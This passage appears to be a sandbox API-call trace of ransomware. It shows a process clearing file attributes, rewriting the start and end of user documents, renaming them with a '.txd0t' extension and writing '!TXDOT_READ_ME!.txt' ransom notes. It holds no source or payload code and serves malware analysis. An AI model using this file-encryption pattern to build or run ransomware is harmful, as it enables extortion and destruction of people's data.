lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ydxefffc99vgn.mp3.txd0t")) returned 1 [0072.638] SetEvent (hEvent=0x3f8) returned 1 [0072.638] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.638] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" [0072.638] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t" [0072.638] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t") returned 0 [0072.638] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt", dwFileAttributes=0x80) returned 1 [0072.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yjcpzl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.639] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=101321) returned 1 [0072.639] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.639] WriteFile (in: hFile=0x470, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.639] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffe7237, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.639] ReadFile (in: hFile=0x470, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x18bc0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x18bc0, lpOverlapped=0x0) returned 1 [0072.641] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffe7440, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.641] WriteFile (in: hFile=0x470, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x18bc0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x18bc0, lpOverlapped=0x0) returned 1 [0072.641] FlushFileBuffers (hFile=0x470) returned 1 [0072.645] GetProcessHeap () returned 0xe30000 [0072.645] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0072.645] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" [0072.645] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt") returned="Yjcpzl.ppt" [0072.645] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.645] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.645] GetProcessHeap () returned 0xe30000 [0072.646] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.646] CloseHandle (hObject=0x470) returned 1 [0072.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yjcpzl.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yjcpzl.ppt.txd0t")) returned 1 [0072.648] SetEvent (hEvent=0x3f8) returned 1 [0072.648] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.649] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" [0072.649] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t" [0072.649] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t") returned 0 [0072.649] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf", dwFileAttributes=0x80) returned 1 [0072.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\_zxyrx.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.649] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=60959) returned 1 [0072.649] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.649] WriteFile (in: hFile=0x470, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.650] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xffff0fe1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.650] ReadFile (in: hFile=0x470, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xee10, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xee10, lpOverlapped=0x0) returned 1 [0072.651] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xffff11f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.651] WriteFile (in: hFile=0x470, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xee10, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xee10, lpOverlapped=0x0) returned 1 [0072.651] FlushFileBuffers (hFile=0x470) returned 1 [0072.657] GetProcessHeap () returned 0xe30000 [0072.657] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0072.657] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" [0072.657] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf") returned="_ZxYRX.rtf" [0072.657] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.657] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.658] GetProcessHeap () returned 0xe30000 [0072.658] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.658] CloseHandle (hObject=0x470) returned 1 [0072.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\_zxyrx.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\_zxyrx.rtf.txd0t")) returned 1 [0072.660] SetEvent (hEvent=0x3f8) returned 1 [0072.660] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.664] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" [0072.664] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t" [0072.664] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t") returned 0 [0072.664] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf", dwFileAttributes=0x80) returned 1 [0072.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\3475v2db.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.665] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=79346) returned 1 [0072.665] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.665] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.666] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffec80e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.666] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x135f0, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x135f0, lpOverlapped=0x0) returned 1 [0072.667] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeca10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.667] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x135f0, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x135f0, lpOverlapped=0x0) returned 1 [0072.668] FlushFileBuffers (hFile=0x460) returned 1 [0072.671] GetProcessHeap () returned 0xe30000 [0072.671] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf8) returned 0xe9d750 [0072.671] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" [0072.671] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf") returned="3475V2DB.pdf" [0072.671] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.671] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 0 [0072.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0072.671] WriteFile (in: hFile=0x464, lpBuffer=0x37ff484*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x37ff484*, lpNumberOfBytesWritten=0x37ff480*=0x2, lpOverlapped=0x0) returned 1 [0072.672] FlushFileBuffers (hFile=0x464) returned 1 [0072.674] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff480, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff480*=0x7f0, lpOverlapped=0x0) returned 1 [0072.675] FlushFileBuffers (hFile=0x464) returned 1 [0072.676] CloseHandle (hObject=0x464) returned 1 [0072.677] GetProcessHeap () returned 0xe30000 [0072.677] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.677] CloseHandle (hObject=0x460) returned 1 [0072.679] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\3475v2db.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\3475v2db.pdf.txd0t")) returned 1 [0072.679] SetEvent (hEvent=0x3f8) returned 1 [0072.679] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.681] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" [0072.681] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t" [0072.681] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t") returned 0 [0072.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls", dwFileAttributes=0x80) returned 1 [0072.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\5dj40kpazh5gabk wvl.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.681] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=71988) returned 1 [0072.681] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.681] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.682] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee4cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.682] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11930, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x11930, lpOverlapped=0x0) returned 1 [0072.684] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee6d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.685] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11930, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x11930, lpOverlapped=0x0) returned 1 [0072.685] FlushFileBuffers (hFile=0x460) returned 1 [0072.687] GetProcessHeap () returned 0xe30000 [0072.687] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2558 [0072.687] StrCpyW (in: psz1=0xed2558, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" [0072.687] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls") returned="5dJ40KpaZH5gABK Wvl.xls" [0072.687] StrCpyW (in: psz1=0xed2590, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.687] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.688] GetProcessHeap () returned 0xe30000 [0072.688] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2558 | out: hHeap=0xe30000) returned 1 [0072.688] CloseHandle (hObject=0x460) returned 1 [0072.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\5dj40kpazh5gabk wvl.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\5dj40kpazh5gabk wvl.xls.txd0t")) returned 1 [0072.690] SetEvent (hEvent=0x3f8) returned 1 [0072.690] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.691] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" [0072.691] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t" [0072.691] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t") returned 0 [0072.692] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png", dwFileAttributes=0x80) returned 1 [0072.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" (normalized: "c:\\users\\fd1hvy\\desktop\\5wpfv5we bjowcfq_8p.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.692] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=72598) returned 1 [0072.692] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.692] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.693] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee26a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.693] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11b90, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x11b90, lpOverlapped=0x0) returned 1 [0072.694] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee470, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.694] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11b90, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x11b90, lpOverlapped=0x0) returned 1 [0072.694] FlushFileBuffers (hFile=0x460) returned 1 [0072.697] GetProcessHeap () returned 0xe30000 [0072.697] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2d00 [0072.697] StrCpyW (in: psz1=0xed2d00, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" [0072.697] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png") returned="5WpFV5we BjOWCFQ_8P.png" [0072.697] StrCpyW (in: psz1=0xed2d38, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.697] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.697] GetProcessHeap () returned 0xe30000 [0072.697] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2d00 | out: hHeap=0xe30000) returned 1 [0072.697] CloseHandle (hObject=0x460) returned 1 [0072.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" (normalized: "c:\\users\\fd1hvy\\desktop\\5wpfv5we bjowcfq_8p.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\5wpfv5we bjowcfq_8p.png.txd0t")) returned 1 [0072.700] SetEvent (hEvent=0x3f8) returned 1 [0072.700] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.701] StrCpyW (in: psz1=0x37ff4a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" [0072.701] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t" [0072.701] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t") returned 0 [0072.701] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg", dwFileAttributes=0x80) returned 1 [0072.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\7sfq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.701] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=18417) returned 1 [0072.701] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.702] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.702] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb60f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.702] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x47f0, lpNumberOfBytesRead=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff460*=0x47f0, lpOverlapped=0x0) returned 1 [0072.703] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.703] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x37ff464, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff464*=0x47f0, lpOverlapped=0x0) returned 1 [0072.703] FlushFileBuffers (hFile=0x460) returned 1 [0072.705] GetProcessHeap () returned 0xe30000 [0072.705] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf0) returned 0xe9d3e8 [0072.705] StrCpyW (in: psz1=0xe9d3e8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg") 